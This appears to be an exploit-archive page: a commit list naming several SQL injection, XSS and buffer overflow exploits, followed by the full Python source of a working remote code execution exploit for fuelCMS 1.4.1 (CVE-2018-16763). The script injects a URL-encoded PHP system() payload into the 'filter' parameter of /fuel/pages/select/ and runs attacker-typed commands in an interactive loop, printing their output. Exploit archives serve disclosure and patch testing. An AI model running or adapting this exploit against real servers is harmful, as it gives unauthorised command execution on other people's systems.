7ec7ea72de
10 changes to exploits/shellcodes MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) fuelCMS 1.4.1 - Remote Code Execution Web Ofisi E-Ticaret 3 - 'a' SQL Injection Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection Web Ofisi Emlak 2 - 'ara' SQL Injection Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection Web Ofisi Firma Rehberi 1 - 'il' SQL Injection Web Ofisi Rent a Car 3 - 'klima' SQL Injection Web Ofisi Firma 13 - 'oz' SQL Injection REDCap < 9.1.2 - Cross-Site Scripting
34 lines
No EOL
1 KiB
Python
Executable file
34 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
|
|
# Date: 2019-07-19
|
|
# Exploit Author: 0xd0ff9
|
|
# Vendor Homepage: https://www.getfuelcms.com/
|
|
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
|
# Version: <= 1.4.1
|
|
# Tested on: Ubuntu - Apache2 - php5
|
|
# CVE : CVE-2018-16763
|
|
|
|
|
|
import requests
|
|
import urllib
|
|
|
|
url = "http://127.0.0.1:8881"
|
|
def find_nth_overlapping(haystack, needle, n):
|
|
start = haystack.find(needle)
|
|
while start >= 0 and n > 1:
|
|
start = haystack.find(needle, start+1)
|
|
n -= 1
|
|
return start
|
|
|
|
while 1:
|
|
xxxx = raw_input('cmd:')
|
|
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
|
|
proxy = {"http":"http://127.0.0.1:8080"}
|
|
r = requests.get(burp0_url, proxies=proxy)
|
|
|
|
html = "<!DOCTYPE html>"
|
|
htmlcharset = r.text.find(html)
|
|
|
|
begin = r.text[0:20]
|
|
dup = find_nth_overlapping(r.text,begin,2)
|
|
|
|
print r.text[0:dup] |